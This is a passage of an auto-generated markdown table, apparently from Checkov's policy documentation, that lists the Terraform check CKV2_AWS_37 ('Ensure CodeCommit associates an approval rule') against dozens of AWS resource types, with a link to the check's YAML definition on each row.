CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1157 | CKV2_AWS_37 | resource | aws_iam_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1158 | CKV2_AWS_37 | resource | aws_iam_group_policy | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1159 | CKV2_AWS_37 | resource | aws_iam_group_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1160 | CKV2_AWS_37 | resource | aws_iam_instance_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1161 | CKV2_AWS_37 | resource | aws_iam_openid_connect_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1162 | CKV2_AWS_37 | resource | aws_iam_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1163 | CKV2_AWS_37 | resource | aws_iam_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1164 | CKV2_AWS_37 | resource | aws_iam_policy_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1165 | CKV2_AWS_37 | 
resource | aws_iam_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1166 | CKV2_AWS_37 | resource | aws_iam_role_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1167 | CKV2_AWS_37 | resource | aws_iam_role_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1168 | CKV2_AWS_37 | resource | aws_iam_saml_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1169 | CKV2_AWS_37 | resource | aws_iam_server_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1170 | CKV2_AWS_37 | resource | aws_iam_service_linked_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1171 | CKV2_AWS_37 | resource | aws_iam_user | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1172 | CKV2_AWS_37 | resource | aws_iam_user_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1173 | CKV2_AWS_37 | resource | aws_iam_user_login_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1174 | CKV2_AWS_37 | resource | aws_iam_user_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1175 | CKV2_AWS_37 | resource | aws_iam_user_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1176 | CKV2_AWS_37 | resource | aws_iam_user_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1177 | CKV2_AWS_37 | resource | aws_inspector_assessment_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1178 | CKV2_AWS_37 | resource | 
aws_inspector_assessment_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1179 | CKV2_AWS_37 | resource | aws_inspector_resource_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1180 | CKV2_AWS_37 | resource | aws_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1181 | CKV2_AWS_37 | resource | aws_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1182 | CKV2_AWS_37 | resource | aws_iot_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1183 | CKV2_AWS_37 | resource | aws_iot_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1184 | CKV2_AWS_37 | resource | aws_iot_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | 
-| 1185 | CKV2_AWS_37 | resource | aws_iot_role_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1186 | CKV2_AWS_37 | resource | aws_iot_thing | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1187 | CKV2_AWS_37 | resource | aws_iot_thing_principal_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1188 | CKV2_AWS_37 | resource | aws_iot_thing_type | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1189 | CKV2_AWS_37 | resource | aws_iot_topic_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1190 | CKV2_AWS_37 | resource | aws_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1191 | CKV2_AWS_37 | resource | aws_kinesis_analytics_application | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1192 | CKV2_AWS_37 | resource | aws_kinesis_firehose_delivery_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1193 | CKV2_AWS_37 | resource | aws_kinesis_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1194 | CKV2_AWS_37 | resource | aws_kinesis_video_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1195 | CKV2_AWS_37 | resource | aws_kms_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1196 | CKV2_AWS_37 | resource | aws_kms_ciphertext | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1197 | CKV2_AWS_37 | resource | aws_kms_external_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1198 | CKV2_AWS_37 | resource | aws_kms_grant | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1199 | CKV2_AWS_37 | resource | aws_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1200 | CKV2_AWS_37 | resource | aws_lambda_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1201 | CKV2_AWS_37 | resource | aws_lambda_event_source_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1202 | CKV2_AWS_37 | resource | aws_lambda_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1203 | CKV2_AWS_37 | resource | aws_lambda_function_event_invoke_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1204 | CKV2_AWS_37 | resource | aws_lambda_layer_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1205 | CKV2_AWS_37 | resource | 
aws_lambda_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1206 | CKV2_AWS_37 | resource | aws_lambda_provisioned_concurrency_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1207 | CKV2_AWS_37 | resource | aws_launch_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1208 | CKV2_AWS_37 | resource | aws_launch_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1209 | CKV2_AWS_37 | resource | aws_lb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1210 | CKV2_AWS_37 | resource | aws_lb_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1211 | CKV2_AWS_37 | resource | aws_lb_listener | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1212 | CKV2_AWS_37 | resource | aws_lb_listener_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1213 | CKV2_AWS_37 | resource | aws_lb_listener_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1214 | CKV2_AWS_37 | resource | aws_lb_ssl_negotiation_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1215 | CKV2_AWS_37 | resource | aws_lb_target_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1216 | CKV2_AWS_37 | resource | aws_lb_target_group_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1217 | CKV2_AWS_37 | resource | aws_licensemanager_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1218 | CKV2_AWS_37 | resource | 
aws_licensemanager_license_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1219 | CKV2_AWS_37 | resource | aws_lightsail_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1220 | CKV2_AWS_37 | resource | aws_lightsail_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1221 | CKV2_AWS_37 | resource | aws_lightsail_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1222 | CKV2_AWS_37 | resource | aws_lightsail_static_ip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1223 | CKV2_AWS_37 | resource | aws_lightsail_static_ip_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1224 | CKV2_AWS_37 | resource | aws_load_balancer_backend_server_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1225 | CKV2_AWS_37 | resource | aws_load_balancer_listener_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1226 | CKV2_AWS_37 | resource | aws_load_balancer_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1227 | CKV2_AWS_37 | resource | aws_macie_member_account_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1228 | CKV2_AWS_37 | resource | aws_macie_s3_bucket_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1229 | CKV2_AWS_37 | resource | aws_main_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1230 | CKV2_AWS_37 | resource | aws_media_convert_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1231 | CKV2_AWS_37 | resource | 
aws_media_package_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1232 | CKV2_AWS_37 | resource | aws_media_store_container | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1233 | CKV2_AWS_37 | resource | aws_media_store_container_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1234 | CKV2_AWS_37 | resource | aws_mq_broker | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1235 | CKV2_AWS_37 | resource | aws_mq_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1236 | CKV2_AWS_37 | resource | aws_msk_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1237 | CKV2_AWS_37 | resource | aws_msk_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | 
-| 1238 | CKV2_AWS_37 | resource | aws_nat_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1239 | CKV2_AWS_37 | resource | aws_neptune_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1240 | CKV2_AWS_37 | resource | aws_neptune_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1241 | CKV2_AWS_37 | resource | aws_neptune_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1242 | CKV2_AWS_37 | resource | aws_neptune_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1243 | CKV2_AWS_37 | resource | aws_neptune_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1244 | CKV2_AWS_37 | resource | aws_neptune_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1245 | CKV2_AWS_37 | resource | aws_neptune_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1246 | CKV2_AWS_37 | resource | aws_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1247 | CKV2_AWS_37 | resource | aws_network_acl_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1248 | CKV2_AWS_37 | resource | aws_network_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1249 | CKV2_AWS_37 | resource | aws_network_interface_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1250 | CKV2_AWS_37 | resource | aws_network_interface_sg_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1251 | CKV2_AWS_37 | resource | aws_opsworks_application | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1252 | CKV2_AWS_37 | resource | aws_opsworks_custom_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1253 | CKV2_AWS_37 | resource | aws_opsworks_ganglia_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1254 | CKV2_AWS_37 | resource | aws_opsworks_haproxy_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1255 | CKV2_AWS_37 | resource | aws_opsworks_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1256 | CKV2_AWS_37 | resource | aws_opsworks_java_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1257 | CKV2_AWS_37 | resource | aws_opsworks_memcached_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | 
-| 1258 | CKV2_AWS_37 | resource | aws_opsworks_mysql_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1259 | CKV2_AWS_37 | resource | aws_opsworks_nodejs_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1260 | CKV2_AWS_37 | resource | aws_opsworks_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1261 | CKV2_AWS_37 | resource | aws_opsworks_php_app_layer | Ensure CodeCommit associates an approval rule | Terraform | 